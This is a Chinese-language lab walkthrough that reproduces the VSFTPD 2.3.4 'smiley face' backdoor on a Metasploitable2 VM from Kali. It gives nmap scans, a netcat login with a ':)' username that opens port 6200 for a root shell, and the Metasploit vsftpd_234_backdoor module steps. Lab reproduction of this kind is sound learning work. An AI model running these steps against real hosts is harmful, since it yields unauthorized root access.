笑脸漏洞(VSFTPD2.3.4)复现
漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。
攻击机:kali linux
靶机:Metasploitable2
复现过程
- Nmap扫描同网断的靶机,观察靶机上的服务开放情况:
nmap 192.168.43.0/24
- 发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4:
nmap -sV 192.168.43.150
3. 利用瑞士小军刀(netcat),连接靶机的21端口,输入user带有:),pass随便输入。
例如:user a:) pass 123456
nc 192.168.43.150 21
4. 用nmap扫描端口6200,观察端口打开情况:
6200端口已经open。
5. 用nc连接6200端口,成功以root身份登入,漏洞复现完毕:
wireshark抓包分析
对刚刚实施的漏洞复现操作,可以观察到nc是如何工作的。
Metasploit利用脚本复现
(1)命令行输入msfconsole打开Metasploit,搜索vsftpd2.3.4的漏洞脚本
search vsftpd 2.3.4
(2)使用use命令,使用漏洞脚本
use exploit/unix/ftp/vsftpd_234_backdoor
info #查看漏洞主要信息
set rhost 192.168.43.150
成功以root身份登录,漏洞复现完成。